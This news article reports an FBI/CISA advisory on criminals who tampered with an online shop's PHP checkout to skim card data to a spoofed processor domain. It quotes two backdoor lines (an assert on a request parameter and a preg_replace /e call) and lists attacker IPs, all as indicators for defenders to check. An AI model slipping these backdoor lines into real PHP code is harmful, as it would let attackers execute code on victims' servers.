How these crooks backdoor online shops and siphon victims' credit card info

FBI and co blow lid off latest PHP tampering scam


The FBI and its friends have warned businesses of crooks scraping people's credit-card details from tampered payment pages on compromised websites.

It's an age-old problem: someone breaks into your online store and alters the code so that as your customers enter their info, copies of their data is siphoned to fraudsters to exploit. The Feds this week have detailed one such effort that reared its head lately.

As early as September 2020, we're told, miscreants compromised at least one American company's vulnerable website from three IP addresses: 80[.]249.207.19, 80[.]82.64.211 and 80[.]249.206.197. The intruders modified the web script TempOrders.php in an attempt to inject malicious code into the checkout.php page.

In an advisory [PDF] from the FBI, and Uncle Sam's CISA and Homeland Security, from January 2022, code was injected into the checkout page to scrape customers' payment details and send it all to a server the crooks controlled that masqueraded as a legitimate card processing system.

As the FBI explained:

The malicious code posts the customer's payment information to a spoofed card processing domain, http://authorizen[.]net/, where the 'n' is added to impersonate or spoof http://authorize[.]net/, a legitimate card processing company's domain.

What's more, the crooks modified files on the infiltrated website's server to install two backdoors. One of these backdoors was a standard web shell – a page that executes commands on the remote system – which was deployed by including the statement assert($_REQUEST['login']) in a PHP page. This statement was exploited by visiting the tampered page with the login URL parameter set to code that fetched and installed the web shell.

The miscreants also slipped in code – @preg_replace("/f/e",$_GET['u'],"fengjiao") – that appears to process a regular expression, and can be exploited to execute code supplied in a URL parameter. Both of these code modifications were used to sneak the PHP web shells P.A.S. and b374 onto the victim's server for further nefarious purposes.

You may want to check the above strings aren't present into your site's PHP source code, and that you haven't a record of the IP addresses in your logs. The FBI also recommends several measures to make your systems less of an easy target for criminals. 

These include regular patching and software updates, changing default login credentials, segmenting network systems to prevent lateral movement, monitoring traffic in your e-commerce environment to identify potential malicious activity, and actively scanning web logs and apps for unauthorized access and abnormal behavior. 

Of course, criminals aren't the only ones with a penchant for scraping data. 

Tracking, marketing, and analytics firms have been exfiltrating the email addresses — and occasionally passwords — of internet users from web forms prior to submission and without user consent, according to researchers.

In a paper scheduled to appear at the Usenix '22 security conference later this year, authors Asuman Senol (imec-COSIC, KU Leuven), Gunes Acar (Radboud University), Mathias Humbert (University of Lausanne) and Frederik Zuiderveen Borgesius, (Radboud University) described how they measured data handling in web forms on the top 100,000 websites, as ranked by research site Tranco. ®


Other stories you might like

  • Cisco warns of security holes in its security appliances
    Bugs potentially useful for rogue insiders, admin account hijackers

    Cisco has alerted customers to another four vulnerabilities in its products, including a high-severity flaw in its email and web security appliances. 

    The networking giant has issued a patch for that bug, tracked as CVE-2022-20664. The flaw is present in the web management interface of Cisco's Secure Email and Web Manager and Email Security Appliance in both the virtual and hardware appliances. Some earlier versions of both products, we note, have reached end of life, and so the manufacturer won't release fixes; it instead told customers to migrate to a newer version and dump the old.

    This bug received a 7.7 out of 10 CVSS severity score, and Cisco noted that its security team is not aware of any in-the-wild exploitation, so far. That said, given the speed of reverse engineering, that day is likely to come. 

    Continue reading
  • 'Prolific' NetWalker extortionist pleads guilty to ransomware charges
    Canadian stole $21.5m from dozens of companies worldwide

    A former Canadian government employee has pleaded guilty in a US court to several charges related to his involvement with the NetWalker ransomware gang.

    On Tuesday, 34-year-old Sebastien Vachon-Desjardins admitted he conspired to commit computer and wire fraud, intentionally damaged a protected computer, and transmitted a demand in relation to damaging a protected computer. 

    He will also forfeit $21.5 million and 21 laptops, mobile phones, gaming consoles, and other devices, according to his plea agreement [PDF], which described Vachon-Desjardins as "one of the most prolific NetWalker Ransomware affiliates" responsible for extorting said millions of dollars from dozens of companies worldwide.

    Continue reading
  • LGBTQ+ folks warned of dating app extortion scams
    Uncle Sam tells of crooks exploiting Pride Month

    The FTC is warning members of the LGBTQ+ community about online extortion via dating apps such as Grindr and Feeld.

    According to the American watchdog, a common scam involves a fraudster posing as a potential romantic partner on one of the apps. The cybercriminal sends explicit of a stranger photos while posing as them, and asks for similar ones in return from the mark. If the victim sends photos, the extortionist demands a payment – usually in the form of gift cards – or threatens to share the photos on the chat to the victim's family members, friends, or employer.

    Such sextortion scams have been going on for years in one form or another, even attempting to hit Reg hacks, and has led to suicides.

    Continue reading

Biting the hand that feeds IT © 1998–2022